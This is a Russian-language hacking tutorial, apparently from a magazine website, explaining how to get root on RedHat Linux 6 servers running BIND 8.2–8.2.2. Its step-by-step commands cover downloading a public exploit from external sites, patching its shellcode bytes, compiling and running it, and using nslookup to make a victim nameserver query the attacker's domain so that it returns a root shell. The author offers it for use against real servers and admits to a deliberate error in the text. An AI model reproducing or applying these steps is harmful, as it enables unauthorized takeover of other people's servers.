Cегодня
я расскажу как заломать RedHat Linux 6.* на котором
гоняется нэйм-сервер bind версии 8.2 - 8.2.2

 Итак что нам потребуется
для взлома сервера.
  1. Ящик пива.
  2. Машина с выходом в Сеть.
  3. Машина в Сети под любым юниксом на которой
вы имеете root доступ.
  5. Немного мозгов в общем тоже не помешают 🙂

Для начала нам нужно поставить
на наш сервер bind и настроить его. Как это сделать?
Есть золотое правило - RTFM, Read The Fuckin Manual. Следуйте
ему и все будет пучком 🙂

После этого топаем на www.ripn.ru и
регистрим любой халявный домен. Для примера
возьмем melkosoft.org.ru. На сайте ripn.ru написано что надо
сделать на своих серверах прежде чем посылать
заявку. Как primary name server прописываем свой сервер.
Кроме того вам потребуется secondary name server. Его можно
посадить у себя, если есть где, можно у друзей,
можно, если хорошо попросить, у меня.

В скором времени наш домен
начинает работать. Тут-то и начинается самое
интересное. На нашей машине убиваем bind

  [root@oberon /root]# killall -KILL named
  (здесь и дальше все примеры команд
приведены для RedHat)

затем выкачиваем нужный
эксплойт.

  [root@oberon /root]# lynx
http://www.hack.co.za/daem0n/named/t666.c

или
  [root@oberon /root]# lynx http://www.oneman.ru/xakep/xakep.xpl.bind.1.c

теперь нужно слегка подправить
исходный код эксплойта. Сгодится любой текстовый
редактор. В теле эксплойта нужно поменять
0x2f,0x61,0x64,0x6d,0x2f на 0x2f,0x62,0x69,0x6e,0x2f. После этого,
перекрестясь, компилим

[root@oberon /root]# gcc -o bindxpl xakep.xpl.bind.1.c

и запускаем

[root@oberon /root] ./bindxpl 1

Эксплойт привязался к порту 53
нашей машины и ждет запроса от жертвы. Как
заставить сервер-жертву (к примеру
ns.cool-security-consulting.com) послать этот запрос? Очень
просто.

[root@oberon /root]# nslookup www.melkosoft.org.ru
ns.cool-security-consulting.com

Жертва обращается к
нэйм-серверу зоны org.ru, тот отсылает к нашей
машине, запрос приходит к нам и обрабатывается
эксплойтом. Ответ, посланый эксплойтом жертве
приведет к сбою bind и выдаст нам root shell. Что с ним
теперь делать - вопрос больной фантазии :0)

Эксплойт работает не только
под RedHat но и под другие платформы. Запустите его
без аргументов для получения полной
информации. 

Вот и все на сегодня, приятной
работы. Да, чуть не забыл. В этой статье мной
допущена небольшая ошибка. Ее поиск и
исправление - тест на наличие некоторого
количества мозгов, необходимого для успешного
хака 🙂

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии